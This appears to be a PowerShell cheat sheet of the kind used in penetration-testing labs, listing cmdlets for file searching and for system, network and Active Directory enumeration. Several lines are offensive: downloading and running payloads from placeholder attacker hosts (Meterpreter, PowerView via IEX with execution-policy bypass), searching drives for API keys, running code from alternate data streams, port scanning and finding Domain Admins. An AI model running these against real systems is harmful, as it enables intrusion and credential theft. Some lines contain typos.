Get-Help Command-Name
Get-Help Command-Name -Examples
Get-Command
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
Verb-Noun | Get-Member
Get-Command | Get-Member -MemberType Method
Get-ChildItem | Select-Object -Property Mode, Name
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet. * Where -operator is a list of the following operators:
Verb-Noun | Sort-Object
Get-ChildItem | Sort-Object
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
Get-HotFix | Format-list | findstr <searchstring>
Get-ChildItem -Hidden -Recurse -ErrorAction SilentlyContinue
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
Get-Content 'C:\Program Files\interesting-file.txt'
(Get-Content -Path file.txt)[index]
Select-String <filename> -Pattern <pattern>
Copy-Item <sourcefile> <destfile>
As an example, count all cmdlets on the system
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object -Word
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
Get-Location
ls | Format-List *
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
powershell -exec bypass -c "IEX(New-Object Net.WebClient).downloadString('http://%ATTACKER_IP%/PowerView.ps1'); Get-NetUser | select samaccountname, description"
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
powershell -ExecutionPolicy Bypass -File .\<file>
Set-ExecutionPolicy Bypass -Scope Process
Get-LocalUser
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
Get-WmiObject win32_useraccount | Select name, sid
netstat -ano
Get-NetIpAddress
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
Get-Hotfix
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
wmic qfe get Caption,Description,HotFixID,InstalledOn
driverquery
Start-Process <process>
Get-Process <process>
schtasks /query /fo LIST /v
Get-ScheduledTaskInfo
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
or
Get-ScheduledTask -TaskName taskname
Get-Item -Path file.exe -Stream *
wmic process call create $(Resolve-Path file.exe:streamname)
Get-Process <process> | Export-Csv <output.csv>
Get-ACL C:\
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
sc query windefend
sc queryex type=service
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
Get-NetGPO
Get-NetDomainTrust
Find-LocalAdminAccess
whoami /priv
Import-Module ActiveDirectory
Get-ADGroup
Get-ADGroupMember
Get-ADPrincipalGroupMembership